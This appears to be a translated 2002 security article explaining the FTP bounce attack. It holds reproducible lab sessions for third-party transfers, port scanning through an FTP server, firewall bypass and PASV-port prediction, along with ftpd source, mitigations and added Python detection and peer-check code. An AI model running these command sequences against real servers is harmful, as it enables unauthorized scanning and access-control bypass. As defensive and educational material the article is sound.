On FTP Bounce Attack


Release Date: 2002-09-17


Author: scz

Home: http://www.nsfocus.com

Date: 2002-01-20

Table of Contents:

1. Preface
2. An intuitive FTP bounce attack example
3. Discussion of the ports involved in the above example
4. The problem with the default FTP server on SPARC/Solaris 7
5. The problem with the default FTP server on x86/FreeBSD 4.3-RELEASE
6. The FTP server implementation in x86/FreeBSD 4.x
7. CERT's response to this problem
8. Related RFCs
9. The harm of FTP bounce attacks
   1) Port scanning
   2) Bypassing conventional firewalls
   3) Downloading sensitive information from a source-IP-restricted site
   4) Combining dynamic firewalls with Java applets
10. Solutions
11. Port selection after the FTP server enters PASV mode on x86/FreeBSD 4.x
12. The possibility of FTP hijacking
13. Use of the proxy command
14. NIDS response to this problem
15. Postscript

------------------------------------------------------------

★ 1. Preface

This article mainly collects, summarises and reviews the FTP bounce attack. If you are already familiar with it, please criticise and correct.

★ 2. An intuitive FTP bounce attack example

100Mbps switch ------ 192.168.5.203 (x86/linux)
      |
      +--- 192.168.5.201 (x86/freebsd 4.3-release)
      |
      +--- 192.168.5.209 (SPARC/Solaris 7)

Suppose 192.168.5.201 and 192.168.5.209 are default installations with the FTP server enabled.

Do the following on 192.168.5.203:

------------------------------------------------------------
telnet 192.168.5.201 21
USER scz                   <- user name
PASS ***                   <- password
CWD src                    <- change to a directory writable by this user (here /home/scz/src, so uploads are possible)
TYPE I                     <- switch the transfer mode
PASV                       <- the server enters passive mode and waits for a TCP connection from the client
227 Entering Passive Mode (192,168,5,201,193,3)
                                         ^^^^^
STOR out                   <- name under which the data received later will be saved
------------------------------------------------------------

Most FTP servers I have used are not case sensitive for command keywords (e.g. user and USER are equivalent); see RFC 959 for how this is defined. At this point the session blocks; leave this window as it is.

Suppose the file /export/home/scz/src/in exists on 192.168.5.209.

Open another window on 192.168.5.203 and do the following:

------------------------------------------------------------
telnet 192.168.5.209 21
USER scz                   <- user name
PASS ***                   <- password
CWD src                    <- change to /export/home/scz/src
TYPE I                     <- switch the transfer mode to binary
PORT 192,168,5,201,193,3   <- the address and port of 192.168.5.201 reported in the 227 reply above
     ^^^^^^^^^^^^^^^^^^^^
RETR in
QUIT
------------------------------------------------------------

Back in the STOR out window, enter:

quit

At this point there is a /home/scz/src/out file on 192.168.5.201 whose contents came from the /export/home/scz/src/in file on 192.168.5.209. The data flowed between 192.168.5.201 and 192.168.5.209, but the control was initiated entirely from 192.168.5.203. That is an intuitive illustration of the FTP bounce attack.

The test shows that the default FTP server on SPARC/Solaris 7 is also vulnerable to FTP bounce, but it does restrict the PORT command: it does not allow a privileged port below 1024. The affected version of PI-Soft SpoonFTP places no restriction on the PORT command: not only can a non-client IP be specified, a privileged port below 1024 can be specified as well.

★ 3. Discussion of the ports involved in the above example

100Mbps switch ------ 192.168.5.203 (x86/linux)
      |
      +--- 192.168.5.201 (x86/freebsd 4.3-release)
      |
      +--- 192.168.5.209 (SPARC/Solaris 7)

1) 192.168.5.203 -> 192.168.5.201 TCP/21

192.168.5.203 calls connect() to 192.168.5.201 TCP/21, establishing the first FTP control connection. After USER, PASS, CWD and TYPE, the last command is PASV, which makes 192.168.5.201 listen on TCP/49411 and wait for a connection request:

193 * 256 + 3 = 49411

As the test shows, once the FTP server on 192.168.5.201 (x86/freebsd 4.3-release) enters passive mode it does not check the client IP of the data connection. From a security standpoint it should: the client IP of the data connection must match the client IP of the control connection.

After the STOR command is issued, the FTP server on 192.168.5.201 blocks, waiting for the data connection.

2) 192.168.5.203 -> 192.168.5.209 TCP/21

192.168.5.203 calls connect() to 192.168.5.209 TCP/21, establishing the second FTP control connection. After USER, PASS, CWD and TYPE comes the PORT command, which tells the FTP server on 192.168.5.209 that the target of its data-connection connect() is 192.168.5.201 TCP/49411.

3) 192.168.5.209 TCP/20 -> 192.168.5.201 TCP/49411

After the RETR in command is sent to 192.168.5.209, 192.168.5.209 calls connect() to TCP/49411 on 192.168.5.201 and sends the file contents over this TCP connection.

Before this connect() the server calls bind() to set its local port to 20. To confirm this you can capture with tcpdump, executed on 192.168.5.201:

# /usr/sbin/tcpdump -i fxp0 -netS -s 96 -c 3000 tcp and src port 20 and src host 192.168.5.209

This selects the interface (-i fxp0), turns off reverse name resolution (-n), prints the link-level header with MAC addresses (-e), suppresses timestamps (-t), prints absolute TCP sequence numbers (-S), uses a snaplen of 96, stops after 3000 packets, and filters for TCP packets with source port 20 and source IP 192.168.5.209.

★ 4. The problem with the default FTP server on SPARC/Solaris 7

The FTP server on the SPARC/Solaris 7 machine used in my test was not specially configured. I have no 2.6 test environment for now, so I cannot confirm whether the default, unconfigured FTP server on SPARC/Solaris 2.6 has the same problem, but I believe it does. In its implementation of the PORT command, this FTP server

1) does not restrict the specified IP to the client IP of the control connection;

however, this FTP server

2) does restrict the specified port to a non-privileged port greater than or equal to 1024.

------------------------------------------------------------
telnet 192.168.5.209 21
USER scz
PASS ***
PORT 192,168,5,201,0,23
500 PORT argument must be 1024 or greater.
------------------------------------------------------------

★ 5. The problem with the default FTP server on x86/FreeBSD 4.3-RELEASE

In its implementation of the PASV command, this FTP server

1) does not restrict data-connection requests to the client IP of the control connection.

In its implementation of the PORT command, this FTP server

2) restricts the specified IP to the client IP of the control connection;

3) restricts the specified port to a non-privileged port greater than or equal to 1024.

------------------------------------------------------------
telnet 192.168.5.201 21
USER scz
PASS ***
PORT 192,168,5,209,0,23
500 Illegal PORT range rejected.
PORT 192,168,5,203,0,23
500 Illegal PORT range rejected.
PORT 192,168,5,203,23,23
200 PORT command successful.
------------------------------------------------------------

★ 6. The FTP server implementation in x86/FreeBSD 4.x

Backend studied this. In the file src/libexec/ftpd/ftpcmd.y there is a port_check() function; /usr/libexec/ftpd is built with the yacc tool.

------------------------------------------------------------
/*
 * Return 1, if port check is done. Return 0, if not yet.
 */
static int
port_check(const char *pcmd)
{
    if (his_addr.su_family == AF_INET) {
        if (data_dest.su_family != AF_INET) {
            usedefault = 1;
            reply(500, "Invalid address rejected.");
            return (1);
        }
        /*
         * Note the two important checks here: the port must not be a
         * reserved (privileged) port, and the address must be the client
         * address of the control connection.
         */
        if (paranoid &&
            ((ntohs(data_dest.su_port) < IPPORT_RESERVED) ||
             memcmp(&data_dest.su_sin.sin_addr,
                    &his_addr.su_sin.sin_addr,
                    sizeof(data_dest.su_sin.sin_addr)))) {
            usedefault = 1;
            reply(500, "Illegal PORT range rejected.");
        } else {
            usedefault = 0;
            if (pdata >= 0) {
                (void) close(pdata);
                pdata = -1;
            }
            reply(200, "%s command successful.", pcmd);
        }
        return (1);
    }
    return (0);
} /* end of port_check */
------------------------------------------------------------

Clearly this FTP server places important restrictions on the PORT command:

1) the specified IP can only be the client IP of the control connection;

2) the specified port must be a non-privileged port greater than or equal to 1024.

If either condition is not met, the reply is "Illegal PORT range rejected."

For the passive mode of this FTP server, man -s 8 ftpd shows the following:

------------------------------------------------------------
-U   In older versions of ftpd, the port used by the data connection after entering PASV mode was in the range [1024, 4999]. In the current version the default range is [49152, 65535]. If ftpd is started with -U, the old port range is used.
------------------------------------------------------------

★ 7. CERT's response to this problem

On 1997-12-10 CERT issued an advisory on this issue:

http://www.cert.org/advisories/ca-1997-27.html

It was last revised on 1999-03-08. Also related to FTP bounce:

http://www.cert.org/tech_tips/ftp_port_attacks.html

★ 8. Related RFCs

RFC 959 is the original FTP protocol specification, and it places no restriction on how the PORT command is implemented. Whether a privileged port below 1024 may be specified is not addressed in RFC 959. Section 3.2 explicitly describes transferring data between two FTP servers under the control of a third party. In other words, the so-called FTP bounce attack is RFC-compliant, which is ironic; it is also a serious security issue in the FTP protocol. Another serious security issue of the FTP protocol is that the user name and password are transmitted in the clear and are easy to sniff.

RFC 1579, "Firewall-Friendly FTP", makes recommendations for FTP clients and does not require any change to the FTP protocol.

RFC 959 suggests that in "server active mode" the target port of the server's connect() is the source port of the control connection. But the vast majority of FTP clients do not follow this suggestion: to avoid the trouble caused by the TIME_WAIT state, they listen() on a new port and tell the FTP server about it with the PORT command. This is a disaster for firewall configuration.

★ 9. The harm of FTP bounce attacks

1) Port scanning

An attacker can have the FTP server perform a connect()-style port scan on its behalf, and the scanned target sees the connections coming from the FTP server rather than from the attacker's own IP.

For example, TCP/3306 on 192.168.5.201 is open. Do the following on 192.168.5.203:

------------------------------------------------------------
telnet 192.168.5.209 21
USER scz
PASS ***
PORT 192,168,5,201,23,23
200 PORT command successful.
NLST
425 Can't build data connection: Connection refused.
PORT 192,168,5,201,12,234
200 PORT command successful.
NLST
150 ASCII data connection for /bin/ls (192.168.5.201,3306) (0 bytes).
226 ASCII Transfer complete.
quit
------------------------------------------------------------

The output above shows that TCP/3306 (12 * 256 + 234) on 192.168.5.201 accepts connect(), while TCP/5911 (23 * 256 + 23) is not open. 192.168.5.201 only ever sees 192.168.5.209 and knows nothing about the attacker at 192.168.5.203. Obviously this undermines access controls such as IP restrictions.

2) Bypassing conventional firewalls

Suppose 192.168.5.209 and 192.168.5.201 are inside the firewall, 192.168.5.203 is outside it and can directly reach only 192.168.5.209, and 192.168.5.201 provides a WWW CGI service on TCP/8080. These CGI services cannot be used directly from 192.168.5.203, but they can from 192.168.5.209.

Using 192.168.5.209 as a stepping stone, 192.168.5.203 can first upload a suitably constructed HTTP-protocol data file to 192.168.5.209 and then use an FTP bounce to send the contents of that file to 192.168.5.201 TCP/8080.

This is a hidden danger to intranet security.

3) Downloading sensitive information from a source-IP-restricted site

For example, some sensitive information on 192.168.5.209 is, for national-policy reasons, not open to 192.168.5.203; only some of its directories are open to everyone. 192.168.5.201 itself is fully open to everyone.

If 192.168.5.209 is vulnerable to the FTP bounce attack and 192.168.5.201 can enter PASV mode, this can be used to move the sensitive information from 192.168.5.209 to 192.168.5.201 and then fetch it from there.

In 1995 hobbit pointed out this problem on the Bugtraq mailing list; see

http://cui.unige.ch/eao/www/techinternet/ftp-attack.html

That article is excellent, but I do not use an FTP client; I telnet directly to port 21 to do the control. A little discussion:

a. The author uses the standard FTP client, hence the quote command. This is not an FTP server command but an FTP client command meaning that the raw text is sent as-is.

b. The author constructs a file like this:

------------------------------------------------------------
user ftp
pass -anonymous@
cwd /export-restricted-crypto
type i
port F,F,F,F,X,X
retr crypto.tar.Z
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
...
------------------------------------------------------------

If you control the session directly over telnet, there is no need to hurry to send quit after retr, so the control connection does not end prematurely and the trailing ^@ (that is, \0) padding is unnecessary.

c. The author also uses a trick:

------------------------------------------------------------
put instrs
quote "port C,C,C,C,0,21"
quote "retr instrs"
------------------------------------------------------------

The PORT command names the target of the next connect(), here the control port TCP/21 of the known host. The RETR command then reads the instrs file and sends its contents over that TCP connection, which is equivalent to typing those control commands on a control connection.

For a "blind" attack, where the echoed data need not be seen, having an existing FTP server do the PORT and forward the submitted input is meaningful. Consider IDS, firewalls, ACLs, logs and so on.

scz note: there are practical problems with this technique; note that 21 < 1024. With the default FTP server settings of x86/FreeBSD 4.3-RELEASE and SPARC/Solaris 7 there is no way to specify such a port through the PORT command, so this trick cannot be used there; instead, control the session directly by telnet to port 21. Of course, such attack techniques could be exploited in the past.

4) Combining dynamic firewalls with Java applets

Suppose Victim is inside the firewall and visits a web page made by Attacker outside the firewall that carries a Java applet. The applet connect()s back to Attacker's TCP/21 port, which does not violate the sandbox principle.

What the applet sends back is an FTP PORT command, so that Attacker then tries to connect() to a protected host on Victim's intranet.

A dynamic packet-filter firewall inspects outbound packets to decide its subsequent filtering. It notices the PORT command and allows Attacker to connect to the intranet host, a connection the firewall would normally not permit.

Martin, David M., Rajagopalan, Sivaramakrishnan, and Rubin, Aviel D. wrote "Blocking Java Applets at the Firewall" in 1997, which discusses this problem specifically; see

http://avirubin.com/block.java.pdf

From this it can be seen once more how much trouble the FTP protocol brings to firewalls, proxies and their configuration.

★ 10. Solutions

Because the so-called FTP bounce attack is permitted by RFC 959, this problem is hard to solve. Many vendors now allow the FTP server's handling of it to be customised; there are several solutions:

1) The FTP server follows RFC 959 strictly and places no restriction on the PORT command, and instead the other network services reject connection requests whose source port is TCP/20.

2) Restrict the PORT command so that it can only specify the client IP of the control connection.

3) Provide two implementations of the PORT command, one of them the default, and allow switching between them. The question then is which one should be the default.

4) Restrict the write permission of the anonymous FTP account. This reduces the usefulness of an FTP bounce but cannot prevent port scanning.

5) Choose a firewall carefully and configure it carefully; the firewall's reaction to this kind of dumb Java applet attack should be to drop the connection.

Note that solving this problem most likely means violating RFC 959.

★ 11. Port selection after the FTP server enters PASV mode on x86/FreeBSD 4.x

A rough look at src/libexec/ftpd/ftpd.c shows that the FTP server does not place much restriction on the source IP after entering PASV mode.

The following function is defined in the file src/libexec/ftpd/ftpd.c:

------------------------------------------------------------

void
passive(void)
{
    int len;
    char *p, *a;

    /*
     * close old port if one set
     */
    if (pdata >= 0)
        close(pdata);

    pdata = socket(ctrl_addr.su_family, SOCK_STREAM, 0);
    if (pdata < 0) {
        perror_reply(425, "Can't open passive connection");
        return;
    }
    (void) seteuid((uid_t)0);

#ifdef IP_PORTRANGE
    if (ctrl_addr.su_family == AF_INET) {
        /*
         * The -U option handler sets this flag:
         *     case 'U':
         *         restricted_data_ports = 0;
         *         break;
         */
        int on = restricted_data_ports ? IP_PORTRANGE_HIGH
                                       : IP_PORTRANGE_DEFAULT;

        if (setsockopt(pdata, IPPROTO_IP, IP_PORTRANGE,
                       (char *)&on, sizeof(on)) < 0)
            goto pasv_error;
    }
#endif

    pasv_addr = ctrl_addr;
    /*
     * Note: port 0 lets the operating system choose the port
     */
    pasv_addr.su_port = 0;
    if (bind(pdata, (struct sockaddr *)&pasv_addr, pasv_addr.su_len) < 0)
        goto pasv_error;

    (void) seteuid((uid_t)pw->pw_uid);

    len = sizeof(pasv_addr);
    if (getsockname(pdata, (struct sockaddr *)&pasv_addr, &len) < 0)
        goto pasv_error;
    /*
     * Note that the second argument of listen() is 1, not the usual 5:
     * this socket handles only a single connection request
     */
    if (listen(pdata, 1) < 0)
        goto pasv_error;

    if (pasv_addr.su_family == AF_INET)
        a = (char *)&pasv_addr.su_sin.sin_addr;
    else if (pasv_addr.su_family == AF_INET6 &&
             IN6_IS_ADDR_V4MAPPED(&pasv_addr.su_sin6.sin6_addr))
        a = (char *)&pasv_addr.su_sin6.sin6_addr.s6_addr[12];
    else
        goto pasv_error;

    p = (char *)&pasv_addr.su_port;

#define UC(b) (((int) b) & 0xff)

    reply(227, "Entering Passive Mode (%d,%d,%d,%d,%d,%d)",
          UC(a[0]), UC(a[1]), UC(a[2]), UC(a[3]), UC(p[0]), UC(p[1]));
    return;

pasv_error:
    (void) seteuid((uid_t)pw->pw_uid);
    (void) close(pdata);
    pdata = -1;
    perror_reply(425, "Can't open passive connection");
    return;
} /* end of passive */
------------------------------------------------------------

Backend explains this function as follows:

------------------------------------------------------------

1) See the file /usr/include/netinet/in.h

/*
 * Argument for IP_PORTRANGE:
 * - which range to search when port is unspecified at bind() or connect()
 */
#define IP_PORTRANGE_DEFAULT    0       /* default range */
#define IP_PORTRANGE_HIGH       1       /* "high" - request firewall bypass */
#define IP_PORTRANGE_LOW        2       /* "low" - vouchsafe security */

/*
 * Ports < IPPORT_RESERVED are reserved for
 * privileged processes (e.g. root).         (IP_PORTRANGE_LOW)
 * Ports > IPPORT_USERRESERVED are reserved
 * for servers, not necessarily privileged.  (IP_PORTRANGE_DEFAULT)
 */
#define IPPORT_RESERVED         1024
#define IPPORT_USERRESERVED     5000

/*
 * Default local port range to use by setting IP_PORTRANGE_HIGH
 */
#define IPPORT_HIFIRSTAUTO      49152
#define IPPORT_HILASTAUTO       65535

/*
 * Scanning for a free reserved port return a value below IPPORT_RESERVED,
 * but higher than IPPORT_RESERVEDSTART.  Traditionally the start value was
 * 512, but that conflicts with some well-known-services that firewalls may
 * have a fit if we use.
 */
#define IPPORT_RESERVEDSTART    600

2) Run the following to view the related tunable kernel parameters

# sysctl -a | grep net.inet.ip.portrange
net.inet.ip.portrange.lowfirst: 1023    <- odd: here the "first" value (1023) is larger than the "last" value
net.inet.ip.portrange.lowlast: 600
net.inet.ip.portrange.first: 1024
net.inet.ip.portrange.last: 5000
net.inet.ip.portrange.hifirst: 49152    <- tunable, but not lower than 1024
net.inet.ip.portrange.hilast: 65535
#

3) Do the following test on x86/FreeBSD 4.3-RELEASE

# sysctl -w net.inet.ip.portrange.hifirst=1024
# sysctl -w net.inet.ip.portrange.hilast=1024
# telnet localhost 21
USER backend
PASS ********
PASV
227 Entering Passive Mode (127,0,0,1,4,0)
^]
telnet> q
# sysctl -w net.inet.ip.portrange.hifirst=49152
# sysctl -w net.inet.ip.portrange.hilast=65535

4) man -s 8 ftpd

-R   If this option is set, ftpd performs no security checks on the PORT command, which is how ftpd behaved historically. The current ftpd checks the PORT command by default: only the client's own IP and a non-privileged port greater than 1023 may be specified. This violates RFC 959 but prevents certain security vulnerabilities.

You can change the ftpd settings in /etc/inetd.conf, send inetd a HUP signal (kill -HUP), and then verify:

# telnet localhost 21
USER backend
PASS ********
PORT 192,168,5,8,0,23      <- 192.168.5.8 is not localhost, and 23 is a privileged port
200 PORT command successful.
^]
telnet> q
#
------------------------------------------------------------

Pay attention here:

pasv_addr.su_port = 0;

The FTP server leaves the choice of port to the operating system and does not keep track of this port value itself. But in my tests this port was found to increase sequentially, meaning the port value is predictable. This is a potential security issue, because a third party can connect to this port and send arbitrary data, which ends up stored in the file named by the STOR command. STOR triggers the accept(). Because the call is listen(pdata, 1), with a backlog of 1, and the socket is close()d after a single accept(), this port offers only one opportunity. With a GUI FTP client there is almost no window for a third party, but the problem is potentially there.

The FTP server on SPARC/Solaris 7 has the same problem after entering PASV mode. The Solaris 7 source package has the directory cmd/cmd_inet/usr_sbin/in_ftpd/ with similar ftpcmd.y and ftpd.c files; at a rough glance they are largely the same as FreeBSD's, after all SunOS 4.x is on the BSD branch.

1) Execute the following from 192.168.5.203

------------------------------------------------------------
telnet 192.168.5.209 21
USER scz
PASS ***
CWD src
TYPE I
PASV
227 Entering Passive Mode (192,168,5,209,130,253)
STOR hello
~~~~~~~~~~~~~~~~~~~~ it blocks here; do not rush to enter the quit command
150 Binary data connection for hello (192.168.5.201,1032).
226 Transfer complete.
quit
221 Goodbye.
Connection closed by foreign host.
------------------------------------------------------------

2) Execute the following from 192.168.5.201

------------------------------------------------------------
telnet 192.168.5.209 33533
world
^D
^]
telnet> q
Connection closed.
------------------------------------------------------------

3) Now check the /export/home/scz/src/hello file on 192.168.5.209

------------------------------------------------------------
[scz@/export/home/scz/src]> cat hello
world
[scz@/export/home/scz/src]> od -A x -t x1 hello
0000000 77 6f 72 6c 64 0d 0a 04 0d 0a
000000a
[scz@/export/home/scz/src]>
------------------------------------------------------------

Note that 192.168.5.209 entered passive mode because of the FTP request from 192.168.5.203, but it handled a data connection from 192.168.5.201. There is no authentication here; the data connection simply uses the privileges of the control connection.
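The restriction that the article says passive() lacks, the data-connection peer must be the client of the control connection, as an added Python example that is not code from the article or from FreeBSD's ftpd. It reproduces the port-0 bind and backlog-1 listen described above, then rejects a mismatched peer without reading from it; it assumes a loopback test in which 127.0.0.1 stands in for the article's hosts.

```python
"""Peer check for a passive-mode FTP data connection (added example, not code
from the article or from FreeBSD's ftpd). It mimics passive(): bind with port
0 so the OS picks the port, listen with backlog 1, accept once. The added
restriction is the one the article says is missing: the data connection's
peer must be the control connection's client, otherwise it is closed unread.
Assumes a loopback test in which 127.0.0.1 stands in for the article's hosts."""
import socket
import threading
from typing import Optional, Tuple


def encode_hp(ip: str, port: int) -> str:
    """RFC 959 h1,h2,h3,h4,p1,p2 text for a 227 reply (port = p1*256 + p2)."""
    return "%s,%d,%d" % (ip.replace(".", ","), port // 256, port % 256)


def open_passive_socket(bind_ip: str = "127.0.0.1") -> socket.socket:
    """Equivalent of pasv_addr.su_port = 0; bind(); listen(pdata, 1)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((bind_ip, 0))  # port 0: the operating system chooses the port
    s.listen(1)           # backlog 1, as in ftpd's passive()
    return s


def pasv_reply(listen_sock: socket.socket) -> str:
    """The 227 reply for the socket's bound address, as passive() formats it."""
    ip, port = listen_sock.getsockname()
    return "227 Entering Passive Mode (%s)" % encode_hp(ip, port)


def accept_data_connection(listen_sock: socket.socket, control_client_ip: str,
                           timeout: float = 2.0) -> Tuple[Optional[socket.socket], str]:
    """accept() exactly once (the port is single use, as in ftpd), then require
    the peer address to equal the control connection's client address.
    Returns (connection or None, peer_ip)."""
    listen_sock.settimeout(timeout)
    try:
        conn, (peer_ip, _) = listen_sock.accept()
    finally:
        listen_sock.close()
    if peer_ip != control_client_ip:
        conn.close()          # close without reading: nothing reaches STOR
        return None, peer_ip
    return conn, peer_ip


def demo(control_client_ip: str) -> Tuple[bool, str, bytes]:
    """Simulated exchange: a peer on 127.0.0.1 connects to the passive port and
    sends 'world' plus CRLF (constructed, as in the article's telnet test).
    Returns (accepted, peer_ip, bytes that STOR would have stored)."""
    ls = open_passive_socket()
    port = ls.getsockname()[1]
    result = {}

    def server():
        conn, peer = accept_data_connection(ls, control_client_ip)
        data = b""
        if conn is not None:
            conn.settimeout(2.0)
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                data += chunk
            conn.close()
        result.update(accepted=conn is not None, peer=peer, data=data)

    t = threading.Thread(target=server)
    t.start()
    c = socket.create_connection(("127.0.0.1", port))
    try:
        c.sendall(b"world\r\n")
    except OSError:
        pass                  # a rejected connection may already be reset
    c.close()
    t.join()
    return result["accepted"], result["peer"], result["data"]


if __name__ == "__main__":
    print(demo("127.0.0.1"))       # (True, '127.0.0.1', b'world\r\n')
    print(demo("192.168.5.203"))   # (False, '127.0.0.1', b'')
```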

★ 12. The possibility of FTP hijacking

Although these operations are somewhat unrealistic on their own, combined with techniques such as "TCP hijacking" and "IP spoofing" this security issue becomes very valuable. I once had some "FTP hijacking" software (faint, it is lost somewhere in the disc pile; whoever has it, please send me a copy, thx).

In fact an FTP bounce attack needs only one FTP server; the other FTP server in the earlier example is just something ready-made, and you can do the socket programming yourself.

Note that the authentication done by the FTP server happens only during USER/PASS; the subsequent PORT, PASV, RETR, STOR and other commands are not authenticated at all and directly use the privileges of the user on the control connection. Let us see what can be done after a legitimate user has logged in successfully:

1) Combine TCP hijacking and IP spoofing to forge commands on the control connection, without needing to consider authentication at all.

2) A third party forges PORT and RETR commands to download data illegally.

3) A third party forges PASV and STOR commands to upload data illegally.

4) A third party predicts the PASV port and overwrites the file directly through the data connection. Note that 4) needs no TCP hijacking: consider sniffer techniques, then use a program to predict the PASV port in a loop, and once connect() succeeds (a SYN half-open scan will not do; as explained earlier, there is only one chance) immediately upload data to overwrite the file. If the legitimately logged-in user is root, !@#$%...

This confirms again that logging in to a remote FTP server as root carries far too many security hazards.

★ 13. Use of the proxy command

On x86/linux, man ftp shows the following:

------------------------------------------------------------
proxy ftp-command

This command allows two FTP control connections to two FTP servers and transfers files between them.

proxy get means the second FTP server plays the role of the client and downloads a file from the first FTP server.

proxy put means the second FTP server plays the role of the client and uploads a file to the first FTP server.

For this command to work, the second FTP server must support the PASV command.

scz note: the first FTP server is in fact required to implement RFC 959 in full and not restrict the PORT command. In other words, the proxy command can only succeed when the first FTP server is vulnerable to FTP bounce.
------------------------------------------------------------

Now let us look at an actual example. Execute the following on 192.168.5.203:

------------------------------------------------------------
ftp 192.168.5.209
scz                        <- enter the user name on 192.168.5.209
***                        <- enter the password on 192.168.5.209
binary                     <- switch the transfer mode on 192.168.5.209
cd src                     <- change directory on 192.168.5.209
debug                      <- turn on debug mode to observe the raw commands
proxy open 192.168.5.201
scz                        <- enter the user name on 192.168.5.201
***                        <- enter the password on 192.168.5.201
proxy binary               <- switch the transfer mode on 192.168.5.201
proxy cd src               <- change directory on 192.168.5.201
proxy get in out           <- 192.168.5.201 downloads the file in from 192.168.5.209 and saves it locally as out
proxy close                <- close the control connection to 192.168.5.201
bye                        <- close the control connection to 192.168.5.209
------------------------------------------------------------

Because debug mode is on, you can see:

------------------------------------------------------------
ftp> proxy get in out
---> PASV
192.168.5.201:227 Entering Passive Mode (192,168,5,201,193,42)
---> PORT 192,168,5,201,193,42
---> RETR in
192.168.5.209:150 Binary data connection for in (192.168.5.201,49450)
---> STOR out
------------------------------------------------------------

Now I understand the proxy command thoroughly and it no longer feels mysterious, heh. Note that proxy is an FTP client command keyword, not an FTP server command keyword; in the end it is broken down into the PASV, STOR, PORT and RETR commands (193 * 256 + 42 = 49450).

★ 14. NIDS response to this problem

If a network IDS does content inspection, it can parse the FTP control stream and check the PORT command:

1) whether the specified IP matches the source IP of the control connection itself;

2) whether the specified port is greater than or equal to 1024.

If either is violated there are two possibilities:

1) the FTP client is legitimately using the proxy command; this is not common;

2) an attacker is carrying out an FTP bounce attack; this is relatively likely.

The NIDS operators can decide whether the NIDS should alert based on the actual topology of the LAN.
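The two PORT checks above (and the same checks that section 10's solution 2 asks of the server), applied to a control stream, as an added Python example that is not code from the article. It also decodes the 227 reply discussed in section 3 so a sensor can record the passive port on which it expects the data connection. The sample lines are constructed from the addresses used in the article, and the sensor is assumed to already know the control connection's client address.

```python
"""NIDS-style checks on FTP control-stream commands (added example, not from
the article). Implements the two PORT checks from sections 6 and 14: the
address must equal the control connection's client address and the port must
be >= 1024. Also decodes 227 PASV replies (section 3) so a sensor can record
the passive port it expects the data connection on. All sample lines are
constructed from the addresses used in the article."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# RFC 959 h1,h2,h3,h4,p1,p2 encoding; whitespace around commas is tolerated
# because the article shows servers accepting "192, 168, 5, 201, 193, 3".
HP_RE = r"(\d{1,3}(?:\s*,\s*\d{1,3}){5})"
PORT_RE = re.compile(r"^PORT\s+" + HP_RE + r"\s*$", re.IGNORECASE)
PASV_RE = re.compile(r"^227\b.*\(" + HP_RE + r"\)")


def decode_hp(arg: str) -> Tuple[str, int]:
    """Decode 'h1,h2,h3,h4,p1,p2' into (ip, port); port = p1 * 256 + p2."""
    octets = [int(x) for x in re.split(r"\s*,\s*", arg.strip())]
    if len(octets) != 6 or any(o > 255 for o in octets):
        raise ValueError("bad h1,h2,h3,h4,p1,p2 argument: %r" % arg)
    return ".".join(str(o) for o in octets[:4]), octets[4] * 256 + octets[5]


def decode_pasv_reply(line: str) -> Optional[Tuple[str, int]]:
    """Return (ip, port) from a '227 Entering Passive Mode (...)' reply."""
    m = PASV_RE.match(line.strip())
    return decode_hp(m.group(1)) if m else None


@dataclass
class Finding:
    line: str
    reason: str


def check_port_command(line: str, control_client_ip: str) -> Optional[List[str]]:
    """Return None if the line is not a PORT command, otherwise the list of
    reasons it violates the checks (an empty list means it passed)."""
    m = PORT_RE.match(line.strip())
    if not m:
        return None
    ip, port = decode_hp(m.group(1))
    reasons = []
    if ip != control_client_ip:
        reasons.append("PORT address %s differs from control client %s"
                       % (ip, control_client_ip))
    if port < 1024:
        reasons.append("PORT port %d is a privileged port (< 1024)" % port)
    return reasons


def scan_control_stream(lines: List[str], control_client_ip: str) -> List[Finding]:
    """Run the PORT checks over every line of one control connection."""
    findings = []
    for line in lines:
        for why in check_port_command(line, control_client_ip) or []:
            findings.append(Finding(line.strip(), why))
    return findings


# Constructed control stream from 192.168.5.203 to the server on 192.168.5.209.
SAMPLE_SESSION = [
    "USER scz",
    "PASS ***",
    "TYPE I",
    "PORT 192,168,5,203,23,23",  # client's own address, port 5911: allowed
    "PORT 192,168,5,201,193,3",  # third-party address: bounce indicator
    "PORT 192,168,5,201,0,23",   # third-party address and privileged port 23
    "RETR in",
]

if __name__ == "__main__":
    for f in scan_control_stream(SAMPLE_SESSION, "192.168.5.203"):
        print("%-28s %s" % (f.line, f.reason))
```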

★ 15. Postscript

The FTP protocol defined by RFC 959 has many security issues, and this article discusses only this one. There are no further test programs here; when there is a chance this document will be extended, for example with the "FTP hijacking" part and a "port scan" program implementation.

Criticism and corrections of this article are welcome.

Thanks to Backend and TT for taking part in the discussion and testing.


Please credit the original address when reposting: https://www.9cbs.com/read-92209.html
